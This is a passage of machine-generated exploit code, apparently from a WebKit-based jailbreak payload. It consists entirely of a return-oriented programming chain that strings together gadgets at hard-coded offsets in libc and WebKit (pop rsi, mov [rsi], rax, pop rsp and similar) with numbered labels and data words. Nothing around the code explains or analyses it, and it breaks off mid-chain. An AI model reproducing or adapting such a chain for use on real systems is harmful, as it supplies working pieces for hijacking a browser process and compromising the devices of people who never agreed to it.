libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+226208, //L3983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3983:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3984:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3985:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+226384, //L3988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226400, //L3989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+226352, //L3986
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3986:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3987:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3988:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3989:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+226472, //L3990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L3990:
db([0, 0]); // 0x0
//L3952:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+226600, //L3993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226616, //L3994
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+226584, //L3992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L3992:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L3993:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L3994:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+226776, //L3999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+226792, //L4000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+226728, //L3996
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L3996:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L3997:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L3998:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L3999:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4000:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+226904, //L4001+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+226896, //L4001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4001:
db([0, 0]); // 0x0
set_gadgets([
ropchain+226920, //L4001+24
ropchain+227872, //L3995
libc_base+764760, //pop rsi
ropchain+226960, //L4002
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4002:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4004:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+227080, //L4007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227064, //L4005
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4005:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4007:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+227224, //L4010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227192, //L4008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227208, //L4009
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4008:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4009:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4010:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227320, //L4012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4011:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4012:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4013:
db([32, 0]); // 0x20
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+227424, //L4014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227440, //L4015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4014:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4015:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
webkit_base+5168252, //setl al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+227616, //L4017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227632, //L4018
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227600, //L4016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4016:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4017:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4018:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+227776, //L4021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+227792, //L4022
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+227744, //L4019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4019:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4020:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L4021:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4022:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+227864, //L4023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4023:
db([0, 0]); // 0x0
//L3995:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+227992, //L4026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228008, //L4027
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+227976, //L4025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4025:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4026:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4027:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228120, //L4029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228168, //L4032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228136, //L4030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4029:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4030:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4031:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4032:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+228280, //L4033+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+228272, //L4033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4033:
db([0, 0]); // 0x0
set_gadgets([
ropchain+228296, //L4033+24
ropchain+230320, //L4028
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+228336, //L4034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L4034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4035:
db([48, 0]); // 0x30
set_gadget(libc_base+144605,); //pop rdi
//L4036:
db([48, 0]); // 0x30
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228528, //L4040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+228496, //L4038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228512, //L4039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4037:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L4038:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4039:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4040:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+228584, //L4042
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L4042:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+228712, //L4044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+228728, //L4045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228696, //L4043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4043:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4044:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4045:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+228824, //L4047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+228808, //L4046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4046:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4047:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+228904, //L4048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4048:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4050:
db([48, 0]); // 0x30
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229024, //L4053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229008, //L4051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4051:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4053:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+229168, //L4056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229136, //L4054
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+229152, //L4055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4054:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4055:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4056:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+229240, //L4058
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4058:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229296, //L4059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4059:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229376, //L4061
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4061:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4063:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229496, //L4066
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229480, //L4064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4064:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4066:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+229640, //L4069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+229608, //L4067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+229624, //L4068
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4067:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4068:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4069:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+229728, //L4071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L4070:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L4071:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+229784, //L4072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4072:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4074:
db([56, 0]); // 0x38
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+229864, //L4076
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4076:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+229968, //L4077
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+229984, //L4078
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4077:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4078:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+755660, //add rax, rcx
libc_base+764760, //pop rsi
ropchain+230072, //L4080
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4080:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+230128, //L4081
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4081:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+230200, //L4084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4084:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+230256, //L4085
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4085:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+1121481, //mov [rax], cl
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+230336, //L4087
//L4028:
libc_base+782311, //pop rsp
ropchain+230352, //L4088
//L4087:
libc_base+782311, //pop rsp
ropchain+223984, //L3929
//L4088:
//L3641:
libc_base+764760, //pop rsi
ropchain+230392, //L4089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4089:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4091:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+230512, //L4094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+230496, //L4092
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4092:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+230688, //L4097
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+230704, //L4098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+230656, //L4095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+230672, //L4096
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4095:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4096:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4097:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4098:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+230800, //L4100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+230784, //L4099
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4099:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4100:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4101:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4102:
db([4, 0]); // 0x4
set_gadget(libc_base+763368,); //pop rcx
//L4103:
db([4, 0]); // 0x4
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+231000, //L4105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4105:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+231056, //L4106
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4106:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+231192, //L4110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+231176, //L4109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4108:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L4109:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4110:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+231328, //L4113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+231360, //L4115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+231312, //L4112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4112:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4113:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4114:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4115:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+231472, //L4116+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+231464, //L4116
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L4116:
db([0, 0]); // 0x0
set_gadgets([
ropchain+231488, //L4116+24
ropchain+261088, //L4111
libc_base+764760, //pop rsi
ropchain+231528, //L4117
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L4117:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4119:
db([96, 0]); // 0x60
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+231648, //L4122
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+231632, //L4120
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4120:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4122:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+231824, //L4125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+231840, //L4126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+231792, //L4123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+231808, //L4124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L4123:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L4124:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L4125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4126:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+231936, //L4128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+231920, //L4127
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L4127:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L4128:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4129:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L4130:
db([10, 0]); // 0xa
set_gadget(libc_base+763368,); //pop rcx
//L4131:
db([10, 0]); // 0xa
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+232136, //L4133
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L4133:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
